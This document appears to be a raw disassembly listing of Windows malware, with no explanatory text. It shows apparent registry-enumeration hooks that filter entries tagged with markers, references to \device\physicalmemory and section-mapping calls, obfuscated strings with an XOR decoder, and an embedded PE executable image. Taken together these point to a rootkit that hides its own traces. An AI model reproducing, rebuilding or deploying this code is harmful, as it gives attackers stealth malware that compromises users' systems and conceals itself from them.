push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CEA1h
test eax, eax
jnz short loc_43CCEB
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CCA9: ; CODE XREF: .data:0043CCAF�j
cmp byte ptr [ebx], 0
jz short loc_43CCB1
inc ebx
jmp short loc_43CCA9
; ---------------------------------------------------------------------------
loc_43CCB1: ; CODE XREF: .data:0043CCAC�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD8D2h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CCD7
popa
jmp short loc_43CCEB
; ---------------------------------------------------------------------------
loc_43CCD7: ; CODE XREF: .data:0043CCD2�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CCE4
pop dword ptr [eax]
loc_43CCE4: ; CODE XREF: .data:0043CCE0�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CC74
; ---------------------------------------------------------------------------
loc_43CCEB: ; CODE XREF: .data:0043CCA1�j
; .data:0043CCD5�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43CCF7
add esp, 4
loc_43CCF7: ; CODE XREF: .data:0043CCF2�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dword_43CCFC dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h ; DATA XREF: .data:0043CF18�o
db 65h, 57h, 0
; ---------------------------------------------------------------------------
loc_43CD0F: ; DATA XREF: .data:0043CF20�o
push ebp
mov ebp, esp
loc_43CD12: ; CODE XREF: .data:0043CD8D�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CD20
push dword ptr [eax]
loc_43CD20: ; CODE XREF: .data:0043CD1C�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CF3Fh
test eax, eax
jnz short loc_43CD8F
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CD47: ; CODE XREF: .data:0043CD4F�j
cmp word ptr [ebx], 0
jz short loc_43CD51
inc ebx
inc ebx
jmp short loc_43CD47
; ---------------------------------------------------------------------------
loc_43CD51: ; CODE XREF: .data:0043CD4B�j
mov dword ptr [ebx], 560023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50DA76h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CD7B
popa
jmp short loc_43CD8F
; ---------------------------------------------------------------------------
loc_43CD7B: ; CODE XREF: .data:0043CD76�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CD88
pop dword ptr [eax]
loc_43CD88: ; CODE XREF: .data:0043CD84�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CD12
; ---------------------------------------------------------------------------
loc_43CD8F: ; CODE XREF: .data:0043CD3F�j
; .data:0043CD79�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43CD9B
add esp, 4
loc_43CD9B: ; CODE XREF: .data:0043CD96�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h
db 65h, 41h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CDB6: ; CODE XREF: .data:0043CE2B�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CDC4
push dword ptr [eax]
loc_43CDC4: ; CODE XREF: .data:0043CDC0�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CFE3h
test eax, eax
jnz short loc_43CE2D
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CDEB: ; CODE XREF: .data:0043CDF1�j
cmp byte ptr [ebx], 0
jz short loc_43CDF3
inc ebx
jmp short loc_43CDEB
; ---------------------------------------------------------------------------
loc_43CDF3: ; CODE XREF: .data:0043CDEE�j
mov word ptr [ebx], 5623h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FDA14h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CE19
popa
jmp short loc_43CE2D
; ---------------------------------------------------------------------------
loc_43CE19: ; CODE XREF: .data:0043CE14�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CE26
pop dword ptr [eax]
loc_43CE26: ; CODE XREF: .data:0043CE22�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CDB6
; ---------------------------------------------------------------------------
loc_43CE2D: ; CODE XREF: .data:0043CDE3�j
; .data:0043CE17�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43CE39
add esp, 4
loc_43CE39: ; CODE XREF: .data:0043CE34�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
db 2 dup(0FFh), 0
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_402B9B+3FE�o
; .data:off_43CE9C�o
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_4022C3+16�o
; .data:0043CEAC�o ...
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: .data:0043CEFC�o
; .data:0043CF1C�o
aIphlpapi_dll db 'iphlpapi.dll',0
aInetmib1_dll db 'inetmib1.dll',0
aWsock32_dll db 'wsock32.dll',0
aUser32_dll db 'user32.dll',0
off_43CE98 dd offset aProcess32next ; DATA XREF: sub_402B9B+C4�r
; sub_402B9B+10F�r ...
; "Process32Next"
off_43CE9C dd offset aKernel32_dll ; DATA XREF: sub_402B9B+A0�r
; "kernel32.dll"
off_43CEA0 dd offset word_43CA3A ; DATA XREF: sub_402976+203�r
byte_43CEA4 db 0 ; DATA XREF: sub_402B9B+66�r
; sub_402B9B+83�r
align 4
dd offset dword_43C95C+4
dd offset aNtdll_dll ; "ntdll.dll"
dd offset loc_43C979
dd 1, 43C8D9h, 43CE43h, 43C8E7h, 1, 43C858h, 43CE43h, 43C866h
dd 2, 43CB51h, 43CE5Ah, 43CB5Dh, 1, 43CAE9h, 43CE5Ah, 43CAF5h
dd 0
dd offset dword_43CBBC+3
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43CBCD
dd 1, 43CC63h, 43CE5Ah, 43CC71h, 0
dd offset dword_43CCFC+5
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43CD0F
dd 1, 43CDA5h, 43CE5Ah, 43CDB3h, 5 dup(0)
dword_43CF48 dd 1 ; DATA XREF: sub_402353+16D�r
dd 0Eh
dword_43CF50 dd 0 ; DATA XREF: .text:0040223E�r
; .text:loc_402257�r ...
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_4022C3+27�o
db '~',0
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_4022C3+41�o
db 0
aNtopensection db 'NtOpenSection',0 ; DATA XREF: sub_4022C3+56�o
aRgjf_0 db ' rGjf ',0
aNtmapviewofsec db 'NtMapViewOfSection',0 ; DATA XREF: sub_4022C3+66�o
a9eub db '9eU/',0
aRtlntstatustod db 'RtlNtStatusToDosError',0 ; DATA XREF: sub_4022C3+76�o
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_402353+D6�o
align 4
aDevicePhysical: ; DATA XREF: sub_402353+25�o
unicode 0, <\device\physicalmemory>,0
byte_43D002 db 0 ; DATA XREF: sub_4022C3+B�o
a_v db '_V',0 ; DATA XREF: sub_402353+6D�o
a3@f1qZ db '3@f1Q|Z',0 ; DATA XREF: sub_402353+1C0�o
aP0r db 'p0R#',0 ; DATA XREF: sub_402528+20�o
align 4
dword_43D014 dd 6 ; DATA XREF: sub_402B9B+1C4�r
; sub_402B9B+5B0�r
dd 0Fh
dword_43D01C dd 0 ; DATA XREF: .text:004025CA�r
; .text:loc_4025EA�r ...
aWcscmp db 'wcscmp',0 ; DATA XREF: .data:off_43D0C8�o
aEkkT db ' ekk$T',0
aHtons db 'htons',0
db '=l |',0
aVirtualprotect db 'VirtualProtect',0
a2po db '2PO*',0
aGetcurrentproc db 'GetCurrentProcessId',0
aFindwindowa db 'FindWindowA',0
aSendmessagea db 'SendMessageA',0
aJsM0 db 'js M0',0
aIsbadreadptr db 'IsBadReadPtr',0
aN3rb db 'n3r ',0
aGlobalfindatom db 'GlobalFindAtomA',0
aThSz db 'Th<SZ',0
aGlobalfindat_0 db 'GlobalFindAtomW',0
a2nA@h db ',2N a@h',0
align 4
byte_43D0C4 db 3 ; DATA XREF: sub_402651+A5�r
align 4
off_43D0C8 dd offset aWcscmp ; DATA XREF: sub_402651+12D�r
; sub_402651+18F�r
; "wcscmp"
off_43D0CC dd offset aNtdll_dll ; DATA XREF: sub_402651+11A�r
; "ntdll.dll"
dd 5, 43D02Eh, 43CE81h, 7, 43D039h, 43CE43h, 8, 43D04Dh
dd 43CE43h, 9, 43D061h, 43CE8Dh, 0Ah, 43D06Dh, 43CE8Dh
dd 0Bh, 43D080h, 43CE43h, 0Ch, 43D093h, 43CE43h, 0Dh, 43D0A9h
dd 43CE43h
byte_43D130 db 76h, 83h, 0 ; DATA XREF: sub_402651+8A�o
aJt16gz db 'jT1 6GZ',0 ; DATA XREF: sub_402651+19C�o
dword_43D13B dd 4C7F83h ; DATA XREF: sub_402976:loc_4029B0�r
aJ8 db ' j8 ',0 ; DATA XREF: sub_402976+9E�o
a2g db '2G',0 ; DATA XREF: sub_402976+D5�o
word_43D147 dw 63h ; DATA XREF: sub_402976+EE�r
byte_43D149 db 53h, 40h, 0 ; DATA XREF: sub_402976+16A�o
word_43D14C dw 37h ; DATA XREF: sub_402976+1AA�r
word_43D14E dw 2067h ; DATA XREF: sub_402B9B+16�o
db 0
aI4Ti db 'i^4$~TI',0 ; DATA XREF: sub_402B9B+19C�o
aVdeND db 'VDe>N;d',0 ; DATA XREF: sub_402B9B+1BC�o
aLd db 'lD',0 ; DATA XREF: sub_402B9B+31B�o
a0htgzcn db '0htGZCn',0 ; DATA XREF: sub_402B9B+35A�o
aT_0 db '^t',0 ; DATA XREF: sub_402B9B+477�o
aB7_evf db '7.Ef',0 ; DATA XREF: sub_402B9B+5E4�o
word_43D176 dw 0 ; DATA XREF: sub_402B9B+7C5�o
dd 8, 0Ah
dword_43D180 dd 0Ah ; DATA XREF: sub_4033E1+16�r
; sub_4033E1:loc_403410�r ...
byte_43D184 db 0 ; DATA XREF: sub_403489+43�o
word_43D185 dw 65h ; DATA XREF: sub_403530+10�r
aGbT db 'gb;|t^',0 ; DATA XREF: sub_403530+53�o
aF db 'f',27h,0 ; DATA XREF: sub_4035A5+16�o
word_43D191 dw 79h ; DATA XREF: sub_4035A5+23�r
align 4
dd 3
dword_43D198 dd 0Fh ; DATA XREF: sub_4036F8+32�r
dword_43D19C dd 0 ; DATA XREF: sub_40366F+E�r
; sub_40366F:loc_40369D�r ...
aAcz?lh db 'ACZ?lH$',0 ; DATA XREF: sub_4036F8+14�o
aIT db '$i',27h,'T',0 ; DATA XREF: sub_4036F8+62�o
word_43D1AD dw 4Fh ; DATA XREF: sub_4037FA+8�r
aBZ db 'b ~z: ',0 ; DATA XREF: sub_4037FA+15�o
align 4
dd 6, 0Fh
dword_43D1C0 dd 0 ; DATA XREF: sub_403845+E�r
; sub_403845:loc_403873�r ...
aAtdG db 'AtD> G#',0 ; DATA XREF: sub_4038DA+16�o
word_43D1CC dw 80h ; DATA XREF: sub_4038DA+3B�r
aYr1 db 'yR1 ',0 ; DATA XREF: .text:0040397D�o
aB db ' ~$',0 ; DATA XREF: .text:00403990�o
dword_43D1D8 dd 203C6Bh ; DATA XREF: .text:00403A44�r
dd 7, 11h
dword_43D1E4 dd 0E5h ; DATA XREF: sub_403A55+D�r
; sub_403A55:loc_403A7B�r ...
dword_43D1E8 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 ; DATA XREF: sub_403D2D+2A5�o
dd 40h, 8 dup(0)
dd 80h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 4550h, 7014Ch, 427CB50Ah, 2 dup(0)
dd 210E00E0h, 3702010Bh, 800h, 0C00h, 1000h, 1190h, 1000h
dd 2000h, 10000000h, 1000h, 200h, 1, 0
dd 4, 0
dd 8000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 7000h, 48h, 5000h, 37Ch, 6 dup(0)
dd 6000h, 0DCh, 3000h, 54h, 12h dup(0)
a_text db '.text',0
align 4
db '',7,0
align 4
dd 1000h, 7BCh, 400h, 3 dup(0)
dd 60000020h, 7373622Eh, 0
dd 0FE0h, 2000h, 5 dup(0)
dd 0C0000080h, 6164722Eh, 6174h, 54h, 3000h, 54h, 0C00h
dd 3 dup(0)
dd 40000020h, 7461642Eh, 61h, 0C4h, 4000h, 0C4h, 0E00h
dd 3 dup(0)
dd 0C0000040h, 6164692Eh, 6174h, 37Ch, 5000h, 37Ch, 1000h
dd 3 dup(0)
dd 0C0000060h, 6C65722Eh, 636Fh, 0E4h, 6000h, 0E4h, 1600h
dd 3 dup(0)
dd 2000020h, 6164652Eh, 6174h, 48h, 7000h, 48h, 1800h
dd 3 dup(0)
dd 40000020h, 5Ch dup(0)
dd 8B40C031h, 0F704244Ch, 60441h, 0F740000h, 824448Bh
dd 1024548Bh, 3B80289h, 0C3000000h
; =============== S U B R O U T I N E =======================================
sub_43D608 proc near ; CODE XREF: .data:0043D730�p
; .data:0043D75E�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001000h
push large dword ptr fs:0
mov large fs:0, esp
loc_43D625: ; CODE XREF: sub_43D608+44�j
; sub_43D608+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43D654
cmp esi, [esp+1Ch+arg_4]
jz short loc_43D654
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43D625
call dword ptr [ebx+esi*4+8]
jmp short loc_43D625
; ---------------------------------------------------------------------------
loc_43D654: ; CODE XREF: sub_43D608+2A�j
; sub_43D608+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43D608 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D662 proc near ; CODE XREF: .data:0043D723�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001092h
push [ebp+arg_0]
call sub_43DCFC
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43D662 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43D757
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43D6B5: ; CODE XREF: .data:0043D74E�j
cmp esi, 0FFFFFFFFh
jz loc_43D766
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43D745
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10004034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10004038h, eax
mov eax, [edx+4]
mov ds:1000403Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10004040h
mov esi, ds:10004038h
rep movsd
lea edi, ds:10004040h
mov ds:10004038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43D745
js short loc_43D753
mov edi, [ebx+8]
push ebx
call sub_43D662
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43D608
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43D745: ; CODE XREF: .data:0043D6C6�j
; .data:0043D71B�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43D6B5
; ---------------------------------------------------------------------------
loc_43D753: ; CODE XREF: .data:0043D71D�j
xor eax, eax
jmp short loc_43D770
; ---------------------------------------------------------------------------
loc_43D757: ; CODE XREF: .data:0043D69A�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43D608
add esp, 0Ch
loc_43D766: ; CODE XREF: .data:0043D6B8�j
push 0Bh
call sub_43DD68
add esp, 4
loc_43D770: ; CODE XREF: .data:0043D755�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43D789
call sub_43D7AC
loc_43D789: ; CODE XREF: .data:0043D782�j
call sub_43DC5B
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10004000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 0B8h, 1, 0
dd 0F2EB0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D7AC proc near ; CODE XREF: .data:0043D784�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_43DD20
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_43DD20
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_43DD20
mov [ebp+var_C], eax
push 1000401Eh
push [ebp+var_8]
call sub_43DD14
mov ds:10004008h, eax
push 1000401Ch
push [ebp+var_4]
call sub_43DD14
mov ds:10004004h, eax
push 1000401Ch
push [ebp+var_C]
call sub_43DD14
add esp, 30h
mov ds:1000400Ch, eax
mov edi, ds:10004004h
or edi, edi
jz short loc_43D825
push 0
push edi
call sub_43DD74
add esp, 8
loc_43D825: ; CODE XREF: sub_43D7AC+6C�j
mov edi, ds:1000400Ch
or edi, edi
jz short loc_43D83F
push 0
push edi
call sub_43DD74
add esp, 8
call sub_43D844
loc_43D83F: ; CODE XREF: sub_43D7AC+81�j
pop edi
leave
retn
sub_43D7AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D844 proc near ; CODE XREF: sub_43D7AC+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_43DC90
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43D881
; ---------------------------------------------------------------------------
loc_43D860: ; CODE XREF: sub_43D844+45�j
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43D86D
inc [ebp+var_C]
loc_43D86D: ; CODE XREF: sub_43D844+24�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43D881: ; CODE XREF: sub_43D844+1A�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43D860
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_43DD44
pop ecx
mov [ebp+var_8], eax
mov ds:10004010h, eax
cmp [ebp+var_8], 0
jnz short loc_43D8B4
xor eax, eax
jmp short loc_43D92A
; ---------------------------------------------------------------------------
loc_43D8B4: ; CODE XREF: sub_43D844+6A�j
mov ebx, [ebp+var_10]
jmp short loc_43D90D
; ---------------------------------------------------------------------------
loc_43D8B9: ; CODE XREF: sub_43D844+D1�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43D907
push [ebp+var_4]
call sub_43DD44
pop ecx
mov esi, [ebp+var_8]
mov ds:0[esi], eax
or eax, eax
jnz short loc_43D8F0
jmp short loc_43D92A
; ---------------------------------------------------------------------------
loc_43D8F0: ; CODE XREF: sub_43D844+A8�j
push ebx
mov edi, [ebp+var_8]
push dword ptr ds:0[edi]
call sub_43DD98
add esp, 8
add [ebp+var_8], 4
loc_43D907: ; CODE XREF: sub_43D844+91�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43D90D: ; CODE XREF: sub_43D844+73�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43D8B9
mov edx, [ebp+var_8]
mov dword ptr ds:0[edx], 0
mov eax, 1
loc_43D92A: ; CODE XREF: sub_43D844+6E�j
; sub_43D844+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D844 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D930 proc near ; CODE XREF: sub_43D9DA+22�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 181h
push esi
push [ebp+arg_0]
mov eax, ds:10004098h
lea eax, ds:10002000h[eax]
push eax
call sub_43DD50
add esp, 0Ch
xor edi, edi
jmp short loc_43D979
; ---------------------------------------------------------------------------
loc_43D95F: ; CODE XREF: sub_43D930+4B�j
mov eax, ds:10004098h
add eax, edi
lea eax, ds:10002000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_43D979: ; CODE XREF: sub_43D930+2D�j
cmp edi, esi
jl short loc_43D95F
mov [ebp+var_8], 389h
mov eax, ds:10004098h
add eax, esi
mov byte ptr ds:10002000h[eax], 0
xor edi, edi
mov edi, ds:10004098h
add dword ptr ds:10004098h, 3
mov eax, ds:10004098h
lea eax, [eax+esi+4]
mov ds:10004098h, eax
inc dword ptr ds:10004098h
cmp dword ptr ds:10004098h, 0DB6h
jle short loc_43D9C9
and dword ptr ds:10004098h, 0
loc_43D9C9: ; CODE XREF: sub_43D930+90�j
mov [ebp+var_C], 9Ch
lea eax, [edi+10002000h]
pop edi
pop esi
leave
retn
sub_43D930 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D9DA proc near ; CODE XREF: .data:0043DB73�p
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea edi, [ebp+var_5]
lea esi, ds:1000409Ch
xor ecx, ecx
inc ecx
rep movsb
call sub_43DCCC
push 5
push 100040BDh
call sub_43D930
add esp, 8
push eax
push 0
push 1F0001h
call sub_43DCF0
mov [ebp+var_4], eax
or eax, eax
jz short loc_43DA35
mov [ebp+var_C], 4FA1h
inc [ebp+var_C]
push eax
call sub_43DCA8
mov [ebp+var_E], 6C6Dh
inc [ebp+var_E]
xor eax, eax
inc eax
loc_43DA35: ; CODE XREF: sub_43D9DA+3C�j
pop edi
pop esi
leave
retn
sub_43D9DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DA39 proc near ; CODE XREF: .data:0043DBA7�p
var_10A = byte ptr -10Ah
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_43DC84
call sub_43DCB4
mov ecx, edi
or eax, 0FFFFFFFFh
loc_43DA57: ; CODE XREF: sub_43DA39+23�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DA57
mov ebx, eax
mov [ebp+var_6], bx
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_43DA8C
; ---------------------------------------------------------------------------
loc_43DA6E: ; CODE XREF: sub_43DA39+59�j
movzx eax, [ebp+var_2]
cmp byte ptr [edi+eax], 5Ch
jnz short loc_43DA88
call sub_43DC78
inc [ebp+var_2]
call sub_43DCCC
jmp short loc_43DA94
; ---------------------------------------------------------------------------
loc_43DA88: ; CODE XREF: sub_43DA39+3D�j
dec [ebp+var_2]
loc_43DA8C: ; CODE XREF: sub_43DA39+33�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_43DA6E
loc_43DA94: ; CODE XREF: sub_43DA39+4D�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_43DAD2
mov [ebp+var_4], 0
jmp short loc_43DAC0
; ---------------------------------------------------------------------------
loc_43DAA6: ; CODE XREF: sub_43DA39+97�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_2]
mov ecx, eax
add ecx, edx
mov dl, [edi+ecx]
mov [ebp+eax+var_10A], dl
inc [ebp+var_4]
loc_43DAC0: ; CODE XREF: sub_43DA39+6B�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_43DAA6
loc_43DAD2: ; CODE XREF: sub_43DA39+63�j
mov esi, 6BBCh
add esi, 7D41h
lea eax, [ebp+var_10A]
push eax
call sub_43DCE4
call sub_43DCD8
pop edi
pop esi
pop ebx
leave
retn
sub_43DA39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DAF3 proc near ; CODE XREF: .data:0043DBFA�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_43DC84
push 100040BBh
push [ebp+arg_0]
call sub_43DD8C
add esp, 8
lea edi, [ebp+var_8]
lea esi, ds:1000409Dh
movsd
movsd
pop edi
pop esi
leave
retn
sub_43DAF3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
mov ax, ds:100040A5h
mov [ebp-217h], ax
mov eax, ds:10004094h
add eax, 698h
push eax
call sub_43DD80
mov byte ptr [ebp-100h], 84h
sub byte ptr [ebp-100h], 68h
mov eax, ds:10004090h
mov edx, eax
add edx, 5
push edx
mov edx, 0Fh
sub edx, ds:10004094h
push edx
mov edx, 4
sub edx, eax
push edx
call sub_43D9DA
add esp, 10h
or eax, eax
jz short loc_43DB87
xor eax, eax
inc eax
jmp loc_43DC30
; ---------------------------------------------------------------------------
loc_43DB87: ; CODE XREF: .data:0043DB7D�j
push 104h
lea eax, [ebp-205h]
push eax
push dword ptr [ebp+8]
call sub_43DC9C
call sub_43DC84
lea eax, [ebp-205h]
push eax
call sub_43DA39
mov byte ptr [ebp-101h], 1Bh
add byte ptr [ebp-101h], 1
lea edi, [ebp-215h]
lea esi, ds:100040A7h
mov ecx, 4
rep movsd
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_43DCC0
mov eax, ds:100040B7h
mov [ebp-21Bh], eax
call sub_43DC84
call sub_43DC78
lea eax, [ebp-0FFh]
push eax
call sub_43DAF3
call sub_43DCCC
lea eax, [ebp-215h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_43DD8C
add esp, 10h
push 1
lea eax, [ebp-0FFh]
push eax
call sub_43DD08
call sub_43DCB4
xor eax, eax
inc eax
loc_43DC30: ; CODE XREF: .data:0043DB82�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 4
dd 243CD950h, 0F24048Bh, 82434BAh, 240C8166h
db 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DC5B
loc_43DC4A: ; CODE XREF: sub_43DC5B+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_43DC5B
; ---------------------------------------------------------------------------
dd 243CD950h
db 58h, 0EBh, 0F3h
; =============== S U B R O U T I N E =======================================
sub_43DC5B proc near ; CODE XREF: .data:loc_43D789�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043DC4A SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
